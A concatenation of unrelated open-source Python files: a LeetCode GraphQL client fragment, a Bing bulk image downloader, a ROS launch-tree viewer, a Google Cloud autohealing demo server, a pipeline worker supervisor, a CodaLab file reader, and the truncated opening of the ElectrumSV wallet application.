'query': '''query getCompanyTag($slug: String!) {
companyTag(slug: $slug) {
name
translatedName
frequencies
questions {
...questionFields
}
}
}
fragment questionFields on QuestionNode {
status
questionId
questionFrontendId
title
titleSlug
translatedTitle
stats
difficulty
isPaidOnly
frequencyTimePeriod
}
'''}
headers = _make_headers()
headers['Referer'] = 'https://leetcode.com/company/{}/'.format(company_slug)
log.info('get_problems_of_company request: headers="%s" body="%s"', headers,
request_body)
res = session.post(LC_GRAPHQL, headers=headers, json=request_body)
log.info('get_problems_of_company response: status="%s" body="%s"',
res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get problems of the company')
return {'company_name': company_slug, 'problems': []}
company_tag = res.json()['data']['companyTag']
if not company_tag:
_echoerr('cannot get problems of the company')
return {'company_name': company_slug, 'problems': []}
if company_tag['frequencies']:
id_to_frequency_map = json.loads(company_tag['frequencies'])
else:
id_to_frequency_map = {}
def process_problem(p):
stats = json.loads(p['stats'])
return {
'state': _state_to_flag(p['status']),
'id': p['questionId'],
'fid': p['questionFrontendId'],
'title': p['title'],
'slug': p['titleSlug'],
'paid_only': p['isPaidOnly'],
'ac_rate': stats['totalAcceptedRaw'] / stats['totalSubmissionRaw'],
'level': p['difficulty'],
'favor': False,
'frequencies': id_to_frequency_map.get(p['questionId'],
EMPTY_FREQUENCIES)[4:]}
return {
'company_name': company_tag['name'],
'problems': [process_problem(p) for p in company_tag['questions']]}
def _thread_main():
global task_running, task_done, task_output, task_err
while True:
task_trigger.acquire()
task_running = True
task_done = False
task_output = None
task_err = ''
log.info('task thread input: name="%s" input="%s"', task_name, task_input)
try:
if task_name == 'test_solution':
task_output = test_solution(*task_input)
elif task_name == 'submit_solution':
task_output = submit_solution(*task_input)
except BaseException as e:
task_err = str(e)
log.info('task thread output: name="%s" output="%s" error="%s"', task_name, task_output,
task_err)
task_running = False
task_done = True
def _in_task():
return current_thread() == task_thread
def _echoerr(s):
global task_err
if _in_task():
task_err = s
else:
print(s)
task_thread = Thread(target=_thread_main, daemon=True)
task_thread.start()
|
bbid.py
|
# Modification: 7/17/2019
# by: Seth Juarez (Microsoft)
# changes: This code has been modified from the original (https://github.com/ostrolucky/Bulk-Bing-Image-downloader).
# Moved bulk '__main__' code to a separate function in order to make it easily callable from other
# python programs. No functional changes were made otherwise.
#
# see: fetch_images function
#!/usr/bin/env python3
import os, urllib.request, re, threading, posixpath, urllib.parse, argparse, socket, time, hashlib, pickle, signal, imghdr
#config
output_dir = './bing' #default output dir
adult_filter = True #Do not disable adult filter by default
socket.setdefaulttimeout(2)
in_progress = tried_urls = []
image_md5s = {}
urlopenheader={ 'User-Agent' : 'Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'}
def download(pool_sema: threading.Semaphore, url: str, output_dir: str):
if url in tried_urls:
return
pool_sema.acquire()
path = urllib.parse.urlsplit(url).path
filename = posixpath.basename(path).split('?')[0] #Strip GET parameters from filename
name, ext = os.path.splitext(filename)
name = name[:36]
filename = name + ext
i = 0
while os.path.exists(os.path.join(output_dir, filename)) or filename in in_progress:
i += 1
filename = "%s-%d%s" % (name, i, ext)
in_progress.append(filename)
try:
request=urllib.request.Request(url,None,urlopenheader)
image=urllib.request.urlopen(request).read()
if not imghdr.what(None, image):
print('FAIL: Invalid image, not saving ' + filename)
return
md5_key = hashlib.md5(image).hexdigest()
if md5_key in image_md5s:
print('FAIL: Image is a duplicate of ' + image_md5s[md5_key] + ', not saving ' + filename)
return
image_md5s[md5_key] = filename
imagefile=open(os.path.join(output_dir, filename),'wb')
imagefile.write(image)
imagefile.close()
print("OK: " + filename)
tried_urls.append(url)
except Exception as e:
print("FAIL: " + filename)
finally:
in_progress.remove(filename)
pool_sema.release()
def fetch_images_from_keyword(pool_sema: threading.Semaphore, keyword: str, output_dir: str, filters: str, limit: int, adlt: str):
current = 0
last = ''
while True:
request_url='https://www.bing.com/images/async?q=' + urllib.parse.quote_plus(keyword) + '&first=' + str(current) + '&count=35&adlt=' + adlt + '&qft=' + ('' if filters is None else filters)
request=urllib.request.Request(request_url,None,headers=urlopenheader)
response=urllib.request.urlopen(request)
html = response.read().decode('utf8')
links = re.findall('murl":"(.*?)"',html)
try:
if links[-1] == last:
return
for index, link in enumerate(links):
if limit is not None and current + index >= limit:
return
t = threading.Thread(target=download, name='bbid', args=(pool_sema, link, output_dir))
t.start()
current += 1
last = links[-1]
except IndexError:
print('No search results for "{0}"'.format(keyword))
return
time.sleep(0.1)
def backup_history(*args):
download_history = open(os.path.join(output_dir, 'download_history.pickle'), 'wb')
pickle.dump(tried_urls,download_history)
copied_image_md5s = dict(image_md5s) #We are working with the copy, because length of input variable for pickle must not be changed during dumping
pickle.dump(copied_image_md5s, download_history)
download_history.close()
print('history_dumped')
if args:
exit(0)
def fetch_images(adult_filter_off=False, adult_filter_on=False, filters=None, limit=None, output=None, search_file=None, search_string=None, threads=20):
if (not search_string) and (not search_file):
raise Exception('Provide Either search string or path to file containing search strings')
if output:
output_dir = output
if not os.path.exists(output_dir):
os.makedirs(output_dir)
output_dir_origin = output_dir
signal.signal(signal.SIGINT, backup_history)
try:
download_history = open(os.path.join(output_dir, 'download_history.pickle'), 'rb')
tried_urls=pickle.load(download_history)
image_md5s=pickle.load(download_history)
download_history.close()
except (OSError, IOError):
tried_urls=[]
if adult_filter:
adlt = ''
else:
adlt = 'off'
if adult_filter_off:
adlt = 'off'
elif adult_filter_on:
adlt = ''
pool_sema = threading.BoundedSemaphore(threads)
if search_string:
fetch_images_from_keyword(pool_sema, search_string,output_dir, filters, limit, adlt)
elif search_file:
try:
inputFile=open(search_file)
except (OSError, IOError):
print("Couldn't open file {}".format(search_file))
exit(1)
for keyword in inputFile.readlines():
output_sub_dir = os.path.join(output_dir_origin, keyword.strip().replace(' ', '_'))
if not os.path.exists(output_sub_dir):
os.makedirs(output_sub_dir)
fetch_images_from_keyword(pool_sema, keyword,output_sub_dir, filters, limit, adlt)
backup_history()
inputFile.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description = 'Bing image bulk downloader')
parser.add_argument('-s', '--search-string', help = 'Keyword to search', required = False)
parser.add_argument('-f', '--search-file', help = 'Path to a file containing search strings line by line', required = False)
parser.add_argument('-o', '--output', help = 'Output directory', required = False)
parser.add_argument('--adult-filter-on', help ='Enable adult filter', action = 'store_true', required = False)
parser.add_argument('--adult-filter-off', help = 'Disable adult filter', action = 'store_true', required = False)
parser.add_argument('--filters', help = 'Any query based filters you want to append when searching for images, e.g. +filterui:license-L1', required = False)
parser.add_argument('--limit', help = 'Make sure not to search for more than specified amount of images.', required = False, type = int)
parser.add_argument('--threads', help = 'Number of threads', type = int, default = 20)
args = parser.parse_args()
fetch_images(**vars(args))
|
launchtree_widget.py
|
#!/usr/bin/env python
import os
import re
import yaml
import threading
import itertools
import rospy
import rospkg
import roslaunch
from .launchtree_loader import LaunchtreeLoader
from .launchtree_config import LaunchtreeConfig, LaunchtreeArg, LaunchtreeRemap, LaunchtreeParam, LaunchtreeRosparam
from PyQt5.uic import loadUi
from PyQt5.QtCore import Qt, Signal
from PyQt5.QtWidgets import QFileDialog, QWidget, QTreeWidgetItem
from PyQt5.QtGui import QIcon, QColor
class LaunchtreeEntryItem(QTreeWidgetItem):
_type_order = [dict, roslaunch.core.Node, LaunchtreeRosparam, roslaunch.core.Param, LaunchtreeRemap, LaunchtreeArg, object]
#inconsistent = False
def __init__(self, *args, **kw ):
super(LaunchtreeEntryItem, self).__init__(*args, **kw)
self.inconsistent = False
def __ge__(self, other):
own_type_idx = map(lambda t: isinstance(self.instance, t), self._type_order).index(True)
other_type_idx = map(lambda t: isinstance(other.instance, t), self._type_order).index(True)
if own_type_idx != other_type_idx:
return own_type_idx >= other_type_idx
return self.text(0) >= other.text(0)
def __lt__(self, other):
return not self.__ge__(other)
class LaunchtreeWidget(QWidget):
update_launch_view = Signal(object)
display_load_error = Signal(str, str)
def __init__(self, context):
super(LaunchtreeWidget, self).__init__()
self._rp = rospkg.RosPack()
self._rp_package_list = self._rp.list()
res_folder = os.path.join(self._rp.get_path('rqt_launchtree'), 'resource')
ui_file = os.path.join(res_folder, 'launchtree_widget.ui')
loadUi(ui_file, self)
self._block_load = True
self.editor = 'gedit' # configure via settings
self.setObjectName('LaunchtreeWidget')
self.reload_button.setIcon(QIcon.fromTheme('view-refresh'))
self._properties_empty_ui = os.path.join(res_folder, 'properties_empty.ui')
self._properties_param_ui = os.path.join(res_folder, 'properties_param.ui')
self._icon_include = QIcon(os.path.join(res_folder, 'img/include.png'))
self._icon_node = QIcon(os.path.join(res_folder, 'img/node.png'))
self._icon_param = QIcon(os.path.join(res_folder, 'img/param.png'))
self._icon_arg = QIcon(os.path.join(res_folder, 'img/arg.png'))
self._icon_remap = QIcon(os.path.join(res_folder, 'img/remap.png'))
self._icon_rosparam = QIcon(os.path.join(res_folder, 'img/rosparam_load.png'))
self._icon_default = QIcon(os.path.join(res_folder, 'img/default.png'))
self._icon_warn = QIcon(os.path.join(res_folder, 'img/warn.png'))
self._launch_separator = ' -- '
self._highlight_color = QColor(255, 255, 150)
self._neutral_color = QColor(255, 255, 255, 0)
# connect signals
self.update_launch_view.connect(self._update_launch_view)
self.display_load_error.connect(self._display_load_error)
self.package_select.currentIndexChanged.connect(self.update_launchfiles)
self.launchfile_select.currentIndexChanged.connect(lambda idx: self.load_launchfile())
self.reload_button.clicked.connect(self.load_launchfile)
self.open_button.clicked.connect(self._root_open_clicked)
self.launch_view.currentItemChanged.connect(self.launch_entry_changed)
self.filter_nodes.toggled.connect(lambda t: self._filter_launch_view())
self.filter_params.toggled.connect(lambda t: self._filter_launch_view())
self.filter_args.toggled.connect(lambda t: self._filter_launch_view())
self.filter_remaps.toggled.connect(lambda t: self._filter_launch_view())
self.filter_empty.toggled.connect(lambda t: self._filter_launch_view())
self.search_input.textChanged.connect(lambda t: self._filter_launch_view(collapse=t==''))
self.launch_open_button.clicked.connect(self._launch_open_clicked)
self.reset()
def reset(self):
self._launch_config = LaunchtreeConfig()
self._package_list = list()
self._load_thread = None
self.properties_content.setCurrentIndex(0)
self.main_view.setCurrentIndex(0)
self.update_package_list()
def block_load(self, do_block):
self._block_load = do_block
def load_launchfile(self):
if self._block_load: return
self.launch_view.clear()
self.properties_content.setCurrentIndex(0)
self.main_view.setCurrentIndex(0)
filename = os.path.join(
self._rp.get_path(self.package_select.currentText()),
self.launchfile_select.currentText()
)
launchargs = roslaunch.substitution_args.resolve_args(self.args_input.text()).split(' ')
if os.path.isfile(filename):
self.progress_bar.setRange(0,0)
self._load_thread = threading.Thread(target=self._load_launch_items, args=[filename, launchargs])
self._load_thread.daemon = True
self._load_thread.start()
def _load_launch_items(self, filename, launchargs):
self._launch_config = LaunchtreeConfig()
items = list()
try:
loader = LaunchtreeLoader()
loader.load(filename, self._launch_config, verbose=False, argv=['','',''] + launchargs)
items = self.display_config_tree(self._launch_config.tree)
except Exception as e:
error_msg = re.sub(r'(\[?(?:/\w+)+\.launch\]?)',
lambda m: '[%s]'%self._filename_to_label(m.group(0)),
str(e)
)
help_msg = ''
if 'arg to be set' in str(e):
help_msg = 'You can pass args to the root launch file by specifying them in the "args" input field, for example "arg_key:=arg_value".'
self.display_load_error.emit(error_msg, help_msg)
self.update_launch_view.emit(items)
def display_config_tree(self, config_tree):
items = list()
for key, instance in config_tree.items():
if key == '_root': continue
i = LaunchtreeEntryItem()
i.instance = instance
if isinstance(i.instance, roslaunch.core.Param):
i.inconsistent = i.instance.inconsistent
if isinstance(instance, dict):
childItems = self.display_config_tree(instance)
i.inconsistent = any(c.inconsistent for c in childItems)
i.addChildren(childItems)
i.instance = instance.get('_root', instance)
if isinstance(i.instance, dict):
i.setText(0, self._filename_to_label(key.split(':')[0]))
i.setIcon(0, self._icon_include if not i.inconsistent else self._icon_warn)
else:
i.setText(0, self._filename_to_label(key.split(':')[0]) if isinstance(i.instance, LaunchtreeRosparam) else
key.split(':')[0])
i.setIcon(0,
self._icon_warn if i.inconsistent else
self._icon_node if isinstance(i.instance, roslaunch.core.Node) else
self._icon_param if isinstance(i.instance, roslaunch.core.Param) else
self._icon_arg if isinstance(i.instance, LaunchtreeArg) else
self._icon_remap if isinstance(i.instance, LaunchtreeRemap) else
self._icon_rosparam if isinstance(i.instance, LaunchtreeRosparam) else
self._icon_default)
items.append(i)
return items
def _display_load_error(self, error_msg, help_msg):
self.error_label.setText(error_msg)
self.help_label.setText(help_msg)
self.main_view.setCurrentIndex(1)
def _update_launch_view(self, items):
self.launch_view.clear()
self.launch_view.addTopLevelItems(items)
self.launch_view.sortItems(0, Qt.AscendingOrder)
self._filter_launch_view()
self.progress_bar.setRange(0,1)
self.progress_bar.setValue(1)
self._load_thread = None
def update_package_list(self):
self._package_list = sorted(
filter(lambda p: len(self._get_launch_files(self._rp.get_path(p)))>0,
self._rp_package_list
)
)
self.package_select.clear()
self.package_select.addItems(self._package_list)
self.package_select.setCurrentIndex(0)
def update_launchfiles(self, idx):
package = self.package_select.itemText(idx)
folder = self._rp.get_path(package)
launchfiles = self._get_launch_files(folder)
self.launchfile_select.clear()
self.launchfile_select.addItems(launchfiles)
def _get_launch_files(self, path):
return sorted(
itertools.imap(lambda p: p.replace(path + '/', ''),
itertools.ifilter(self._is_launch_file,
itertools.chain.from_iterable(
itertools.imap(lambda f:
map(lambda n: os.path.join(f[0], n), f[2]),
os.walk(path)
)
)
)
)
)
def _is_launch_file(self, path):
if not os.path.isfile(path): return False
(root, ext) = os.path.splitext(path)
if ext != '.launch': return False
return True
def launch_entry_changed(self, current, previous):
#clear properties
if current is None:
return
data = current.instance
if isinstance(data, dict) and data.has_key('_root'):
data = data['_root']
if isinstance(data, roslaunch.core.Param):
self.properties_content.setCurrentIndex(1)
self.param_name.setText(data.key.split('/')[-1] + ':')
if isinstance(data.value, list):
self.param_value_list.clear()
self.param_value_list.addItems(list(str(v) for v in data.value))
self.param_value_panel.setCurrentIndex(2)
elif len(str(data.value)) < 100:
self.param_value.setText(str(data.value))
self.param_value_panel.setCurrentIndex(0)
else:
self.param_value_long.setPlainText(str(data.value))
self.param_value_panel.setCurrentIndex(1)
elif isinstance(data, roslaunch.core.Node):
self.properties_content.setCurrentIndex(2)
self.node_package.setText(data.package)
self.node_type.setText(data.type)
self.node_namespace.setText(str(data.namespace))
self.node_args.setText(str(data.args))
self.node_args.setEnabled(data.args != '')
self.node_prefix.setText(str(data.launch_prefix) if data.launch_prefix is not None else '')
self.node_prefix.setEnabled(data.launch_prefix is not None)
self.node_machine.setText(str(data.machine_name) if data.machine_name is not None else '')
self.node_machine.setEnabled(data.machine_name is not None)
elif isinstance(data, LaunchtreeArg):
self.properties_content.setCurrentIndex(4)
self.arg_name.setText(data.name)
self.arg_value.setText(str(data.value) if data.value is not None else '')
self.arg_default.setText(str(data.default) if data.default is not None else '')
self.arg_doc.setText(str(data.doc) if data.doc is not None else '')
self.arg_value.setEnabled(data.value is not None)
self.arg_default.setEnabled(not self.arg_value.isEnabled())
elif isinstance(data, LaunchtreeRemap):
self.properties_content.setCurrentIndex(5)
self.remap_from.setText(data.from_topic)
self.remap_to.setText(data.to_topic)
elif isinstance(data, roslaunch.core.Machine):
self.properties_content.setCurrentIndex(6)
self.machine_address.setText(str(data.address))
self.machine_port.setText(str(data.ssh_port))
self.machine_user.setText(str(data.user) if data.user is not None else '')
self.machine_user.setEnabled(data.user is not None)
self.machine_loader.setText(str(data.env_loader) if data.env_loader is not None else '')
self.machine_loader.setEnabled(data.env_loader is not None)
elif isinstance(data, LaunchtreeRosparam):
self.properties_content.setCurrentIndex(3)
path_segments = self.launch_view.currentItem().text(0).split(self._launch_separator)
if len(path_segments) == 2:
(p, l) = path_segments
(d, f) = os.path.split(l)
else:
p = None
f = path_segments[0]
self.file_package.setText(p if p is not None else '')
self.file_package.setEnabled(p is not None)
self.file_name.setText(f)
elif isinstance(data, dict):
self.properties_content.setCurrentIndex(3)
(p, l) = self.launch_view.currentItem().text(0).split(self._launch_separator)
(d, f) = os.path.split(l)
self.file_package.setText(p)
self.file_name.setText(f)
else:
self.properties_content.setCurrentIndex(0)
def _filter_launch_view(self, collapse=False):
show_nodes = self.filter_nodes.isChecked()
show_params = self.filter_params.isChecked()
show_args = self.filter_args.isChecked()
show_remaps = self.filter_remaps.isChecked()
show_empty = self.filter_empty.isChecked()
search_text = self.search_input.text()
highlight = search_text != ''
expand = not collapse and highlight
def filter_launch_entry(entry):
show = False
# param
if isinstance(entry.instance, roslaunch.core.Param):
show = show_params
# node
elif isinstance(entry.instance, roslaunch.core.Node):
show = show_nodes
# machine (no separate option to display machines, is coupled to nodes)
elif isinstance(entry.instance, roslaunch.core.Machine):
show = show_nodes
# arg
elif isinstance(entry.instance, LaunchtreeArg):
show = show_args
# remap
elif isinstance(entry.instance, LaunchtreeRemap):
show = show_remaps
show &= search_text in entry.text(0)
if show:
# color = self._highlight_color if highlight else self._neutral_color
# entry.setStyleSheet("background-color:%s" % color)
entry.setBackground(0, self._highlight_color if highlight else self._neutral_color)
if entry.childCount() > 0:
not_empty = any(map(filter_launch_entry, map(entry.child, range(entry.childCount()))))
show |= show_empty or not_empty
entry.setExpanded(not collapse and (expand or entry.isExpanded()))
entry.setHidden(not show)
return show
for idx in range(self.launch_view.topLevelItemCount()):
filter_launch_entry(self.launch_view.topLevelItem(idx))
def _launch_open_clicked(self):
(p, l) = self.launch_view.currentItem().text(0).split(self._launch_separator)
filename = os.path.join(self._rp.get_path(p), l)
thread = threading.Thread(target=os.system, args=['%s %s' % (self.editor, filename)])
thread.daemon = True
thread.start()
def _root_open_clicked(self):
filename = os.path.join(
self._rp.get_path(self.package_select.currentText()),
self.launchfile_select.currentText()
)
thread = threading.Thread(target=os.system, args=['%s %s' % (self.editor, filename)])
thread.daemon = True
thread.start()
def shutdown(self):
pass
def _filename_to_label(self, filename):
tail = list()
for d in reversed(filename.split('/')):
if d in self._rp_package_list:
return '%s%s%s' % (d, self._launch_separator, '/'.join(reversed(tail)))
else:
tail.append(d)
return filename
|
app.py
|
# Copyright 2019, Google, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Flask app to be used as an interactive demonstration of autohealing.
Exposes a simple UI showing basic server stats and a toggle button to
simulate a healthy/unhealthy server status for any attached health check.
Attached health checks should query the '/health' path.
"""
from ctypes import c_bool
from multiprocessing import Process, Value
from random import random
from re import sub
from socket import gethostname
from time import sleep
from flask import Flask, make_response, render_template
from requests import get
PORT_NUMBER = 80
app = Flask(__name__)
_is_healthy = True
_cpu_burner = None
@app.before_first_request
def init():
global _cpu_burner
_cpu_burner = CpuBurner()
@app.route('/')
def index():
"""Returns the demo UI."""
global _cpu_burner, _is_healthy
return render_template('index.html',
hostname=gethostname(),
zone=_get_zone(),
template=_get_template(),
healthy=_is_healthy,
working=_cpu_burner.is_running())
@app.route('/health')
def health():
"""Returns the simulated 'healthy'/'unhealthy' status of the server.
Returns:
HTTP status 200 if 'healthy', HTTP status 500 if 'unhealthy'
"""
global _is_healthy
template = render_template('health.html', healthy=_is_healthy)
return make_response(template, 200 if _is_healthy else 500)
@app.route('/makeHealthy')
def make_healthy():
"""Sets the server to simulate a 'healthy' status."""
global _cpu_burner, _is_healthy
_is_healthy = True
template = render_template('index.html',
hostname=gethostname(),
zone=_get_zone(),
template=_get_template(),
healthy=True,
working=_cpu_burner.is_running())
response = make_response(template, 302)
response.headers['Location'] = '/'
return response
@app.route('/makeUnhealthy')
def make_unhealthy():
"""Sets the server to simulate an 'unhealthy' status."""
global _cpu_burner, _is_healthy
_is_healthy = False
template = render_template('index.html',
hostname=gethostname(),
zone=_get_zone(),
template=_get_template(),
healthy=False,
working=_cpu_burner.is_running())
response = make_response(template, 302)
response.headers['Location'] = '/'
return response
@app.route('/startLoad')
def start_load():
"""Sets the server to simulate high CPU load."""
global _cpu_burner, _is_healthy
_cpu_burner.start()
template = render_template('index.html',
hostname=gethostname(),
zone=_get_zone(),
template=_get_template(),
healthy=_is_healthy,
working=True)
response = make_response(template, 302)
response.headers['Location'] = '/'
return response
@app.route('/stopLoad')
def stop_load():
"""Sets the server to stop simulating CPU load."""
global _cpu_burner, _is_healthy
_cpu_burner.stop()
template = render_template('index.html',
hostname=gethostname(),
zone=_get_zone(),
template=_get_template(),
healthy=_is_healthy,
working=False)
response = make_response(template, 302)
response.headers['Location'] = '/'
return response
def _get_zone():
"""Gets the GCE zone of this instance.
Returns:
str: The name of the zone if the zone was successfully determined.
Empty string otherwise.
"""
r = get('http://metadata.google.internal/'
'computeMetadata/v1/instance/zone',
headers={'Metadata-Flavor': 'Google'})
if r.status_code == 200:
return sub(r'.+zones/(.+)', r'\1', r.text)
else:
return ''
def _get_template():
"""Gets the GCE instance template of this instance.
Returns:
str: The name of the template if the template was successfully
determined and this instance was built using an instance template.
Empty string otherwise.
"""
r = get('http://metadata.google.internal/'
'computeMetadata/v1/instance/attributes/instance-template',
headers={'Metadata-Flavor': 'Google'})
if r.status_code == 200:
return sub(r'.+instanceTemplates/(.+)', r'\1', r.text)
else:
return ''
class CpuBurner:
"""
Object to asynchronously burn CPU cycles to simulate high CPU load.
Burns CPU in a separate process and can be toggled on and off.
"""
def __init__(self):
self._toggle = Value(c_bool, False, lock=True)
self._process = Process(target=self._burn_cpu)
self._process.start()
def start(self):
"""Start burning CPU."""
self._toggle.value = True
def stop(self):
"""Stop burning CPU."""
self._toggle.value = False
def is_running(self):
"""Returns true if currently burning CPU."""
return self._toggle.value
def _burn_cpu(self):
"""Burn CPU cycles if work is toggled, otherwise sleep."""
while True:
random()*random() if self._toggle.value else sleep(1)
if __name__ == "__main__":
app.run(debug=False, port=PORT_NUMBER)
|
piper.py
|
from multiprocessing import Process
from inputs import load_input
from handles import load_handle
from outputs import load_output
from worker import Worker
from config import config
import time
def _create_worker_process(input_, handle, output, interval=.2):
worker = Worker(input_, handle, output, interval)
return Process(target=worker.start, daemon=True)
def _start_piper(*worker_confs):
worker_pool = [
_create_worker_process(
load_input(conf['input']['name'], **conf['input'].get('kwargs', {})),
load_handle(conf['handle']['name'], **conf['handle'].get('kwargs', {})),
load_output(conf['output']['name'], **conf['output'].get('kwargs', {})))
for conf in worker_confs
]
for w in worker_pool:
w.start()
return worker_pool
def main():
"""
Start pipeline worker daemon
"""
worker_confs = config.get('workers', [])
assert worker_confs, 'Worker config not found'
is_alive = False
worker_pool = []
while True:
if not is_alive:
for p in worker_pool:
p.terminate()
worker_pool = _start_piper(*worker_confs)
is_alive = True
for p in worker_pool:
if not p.is_alive():
is_alive = False
break
time.sleep(.1)
if __name__ == '__main__':
main()
|
local_reader.py
|
from contextlib import closing
import httplib
import os
import threading
from codalabworker.run_manager import Reader
import codalabworker.download_util as download_util
from codalabworker.download_util import get_target_path, PathException
from codalabworker.file_util import (
gzip_file,
gzip_string,
read_file_section,
summarize_file,
tar_gzip_directory,
)
class LocalReader(Reader):
"""
Class that implements read functions for bundles executed on the local filesystem
"""
def __init__(self):
super(LocalReader, self).__init__()
self.read_threads = [] # Threads
def stop(self):
for thread in self.read_threads:
thread.join()
def _threaded_read(self, run_state, path, stream_fn, reply_fn):
"""
Given a run state, a path, a stream function and a reply function,
- Computes the real filesystem path to the path in the bundle
- In case of error, invokes reply_fn with an http error
- Otherwise starts a thread calling stream_fn on the computed final path
"""
try:
final_path = get_target_path(run_state.bundle_path, run_state.bundle['uuid'], path)
except PathException as e:
reply_fn((httplib.NOT_FOUND, e.message), None, None)
read_thread = threading.Thread(target=stream_fn, args=[final_path])
read_thread.start()
self.read_threads.append(read_thread)
def get_target_info(self, run_state, path, dep_paths, args, reply_fn):
"""
Return target_info of path in bundle as a message on the reply_fn
"""
bundle_uuid = run_state.bundle['uuid']
target_info = None
# if path is a dependency raise an error
if path and os.path.normpath(path) in dep_paths:
err = (httplib.NOT_FOUND, '{} not found in bundle {}'.format(path, bundle_uuid))
reply_fn(err, None, None)
return
else:
try:
target_info = download_util.get_target_info(
run_state.bundle_path, bundle_uuid, path, args['depth']
)
except PathException as e:
err = (httplib.NOT_FOUND, e.message)
reply_fn(err, None, None)
return
if not path and args['depth'] > 0:
target_info['contents'] = [
child for child in target_info['contents'] if child['name'] not in dep_paths
]
reply_fn(None, {'target_info': target_info}, None)
def stream_directory(self, run_state, path, dep_paths, args, reply_fn):
"""
Stream the directory at path using a separate thread
"""
exclude_names = [] if path else dep_paths
def stream_thread(final_path):
with closing(tar_gzip_directory(final_path, exclude_names=exclude_names)) as fileobj:
reply_fn(None, {}, fileobj)
self._threaded_read(run_state, path, stream_thread, reply_fn)
def stream_file(self, run_state, path, dep_paths, args, reply_fn):
"""
Stream the file at path using a separate thread
"""
def stream_file(final_path):
with closing(gzip_file(final_path)) as fileobj:
reply_fn(None, {}, fileobj)
self._threaded_read(run_state, path, stream_file, reply_fn)
def read_file_section(self, run_state, path, dep_paths, args, reply_fn):
"""
Read the section of file at path of length args['length'] starting at
args['offset'] using a separate thread
"""
def read_file_section_thread(final_path):
string = gzip_string(read_file_section(final_path, args['offset'], args['length']))
reply_fn(None, {}, string)
self._threaded_read(run_state, path, read_file_section_thread, reply_fn)
def summarize_file(self, run_state, path, dep_paths, args, reply_fn):
"""
Summarize the file including args['num_head_lines'] and
args['num_tail_lines'] but limited with args['max_line_length'] using
args['truncation_text'] on a separate thread
"""
def summarize_file_thread(final_path):
string = gzip_string(
summarize_file(
final_path,
args['num_head_lines'],
args['num_tail_lines'],
args['max_line_length'],
args['truncation_text'],
)
)
reply_fn(None, {}, string)
self._threaded_read(run_state, path, summarize_file_thread, reply_fn)
|
app.py
|
# ElectrumSV - lightweight Bitcoin client
# Copyright (C) 2019-2020 The ElectrumSV Developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
'''ElectrumSV application.'''
import concurrent
import datetime
import os
from functools import partial
import signal
import sys
import threading
from typing import Callable, Optional
from aiorpcx import run_in_thread
import PyQt5.QtCore as QtCore
from PyQt5.QtCore import pyqtSignal, QObject, QTimer
from PyQt5.QtGui import QGuiApplication
from PyQt5.QtWidgets import QApplication, QSystemTrayIcon, QMenu, QWidget, QDialog
from electrumsv.app_state import app_state
from electrumsv.contacts import ContactEntry, ContactIdentity
from electrumsv.i18n import _, set_language
from electrumsv.logs import logs
from electrumsv.wallet import AbstractAccount, Wallet
from electrumsv.wallet_database.tables import WalletEventRow
from . import dialogs
from .cosigner_pool import CosignerPool
from .main_window import ElectrumWindow
from .exception_window import Exception_Hook
from .label_sync import LabelSync
from .log_window import SVLogWindow, SVLogHandler
from .util import ColorScheme, get_default_language, MessageBox, read_QIcon
from .wallet_wizard import WalletWizard
logger = logs.get_logger('app')
class OpenFileEventFilter(QObject):
def __init__(self, windows):
super().__init__()
self.windows = windows
def eventFilter(self, obj, event):
if event.type() == QtCore.QEvent.FileOpen:
if len(self.windows) >= 1:
self.windows[0].pay_to_URI(event.url().toString())
return True
return False
class SVApplication(QApplication):
# Signals need to be on a QObject
create_new_window_signal = pyqtSignal(str, object)
cosigner_received_signal = pyqtSignal(object, object)
labels_changed_signal = pyqtSignal(object, object, object)
window_opened_signal = pyqtSignal(object)
window_closed_signal = pyqtSignal(object)
# Async tasks
async_tasks_done = pyqtSignal()
# Logging
new_category = pyqtSignal(str)
new_log = pyqtSignal(object)
# Preferences updates
fiat_ccy_changed = pyqtSignal()
custom_fee_changed = pyqtSignal()
op_return_enabled_changed = pyqtSignal()
num_zeros_changed = pyqtSignal()
base_unit_changed = pyqtSignal()
fiat_history_changed = pyqtSignal()
fiat_balance_changed = pyqtSignal()
update_check_signal = pyqtSignal(bool, object)
# Contact events
contact_added_signal = pyqtSignal(object, object)
contact_removed_signal = pyqtSignal(object)
identity_added_signal = pyqtSignal(object, object)
identity_removed_signal = pyqtSignal(object, object)
new_notification = pyqtSignal(object, object)
def __init__(self, argv):
QtCore.QCoreApplication.setAttribute(QtCore.Qt.AA_X11InitThreads)
if hasattr(QtCore.Qt, "AA_ShareOpenGLContexts"):
QtCore.QCoreApplication.setAttribute(QtCore.Qt.AA_ShareOpenGLContexts)
if hasattr(QGuiApplication, 'setDesktopFileName'):
QGuiApplication.setDesktopFileName('electrum-sv.desktop')
super().__init__(argv)
self.windows = []
self.log_handler = SVLogHandler()
self.log_window = None
self.net_dialog = None
self.timer = QTimer()
self.exception_hook = None
# A floating point number, e.g. 129.1
self.dpi = self.primaryScreen().physicalDotsPerInch()
# init tray
